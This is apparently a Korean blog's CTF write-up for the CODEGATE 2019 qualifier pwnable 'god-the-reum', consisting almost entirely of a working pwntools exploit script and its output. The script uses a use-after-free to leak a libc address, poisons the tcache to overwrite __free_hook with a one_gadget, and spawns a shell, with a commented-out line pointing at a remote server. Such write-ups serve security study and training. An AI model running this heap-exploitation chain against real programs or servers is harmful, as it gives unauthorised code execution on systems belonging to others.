Category : pwnable


Summary : use-after-free, tcache, __free_hook




Exploit

#!/usr/bin/python

from pwn import *

def cmd_create(amount):
ru(': ')
sl(str(1))
ru(': ')
sl(str(amount))

def cmd_deposit(wallet_no, amount):
ru(': ')
sl(str(2))
ru(': ')
sl(str(wallet_no))
ru(': ')
sl(str(amount))

def cmd_withdraw(wallet_no, amount):
ru(': ')
sl(str(3))
ru(': ')
sl(str(wallet_no))
ru(': ')
sl(str(amount))

def cmd_show():
res = []
ru(': ')
sl(str(4))
ru('========== My Wallet List =============\n')
while 1:
line = rl(False)
if line == '':
break
res.append(int(line.split('ballance ')[1]))
return res

def cmd_new_eth(wallet_no, new_eth):
ru(': ')
sl(str(6))
ru(': ')
sl(str(wallet_no))
ru(': ')
sl(new_eth)

s = process('./god-the-reum')
#s = remote('110.10.147.103', 10001)
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

cmd_create(0x420) # 0
cmd_create(0x50) # 1

cmd_withdraw(0, 0x420) # free
cmd_withdraw(1, 0x50) # free

libc_leak, _= cmd_show()
libc_base = libc_leak - 0x3ebca0
malloc_hook = libc_base + 0x3ebc30
free_hook = libc_base + 0x3ed8e8
libc_one_gadget = libc_base + 0xe569f

cmd_new_eth(1, p64(free_hook))
# (0x60) tcache_entry[4]: 0x5623649f77b0 --> 0x7f51275e38e8

cmd_create(0x50) # 2
cmd_create(0x50) # 3

cmd_new_eth(3, p64(libc_one_gadget))
cmd_withdraw(2, 0x50)
ru('withdraw? : ')

s.interactive()
s.close()


$ python exploit.py
[+] Starting local process './god-the-reum': pid 2779
[*] Switching to interactive mode
$ id

uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)

'CTF > 2019' 카테고리의 다른 글

0CTF 2019 - Fast&Furious  (0) 2019.07.21
0CTF 2019 - Fast&Furious2  (0) 2019.07.21
CODEGATE 2019 QUAL - cg_casino  (1) 2019.01.31
CODEGATE 2019 QUAL - Maris_shop  (0) 2019.01.31
CODEGATE 2019 QUAL - god-the-reum  (0) 2019.01.29

WRITTEN BY
pwn3r_45

트랙백  0 , 댓글  0개가 달렸습니다.
secret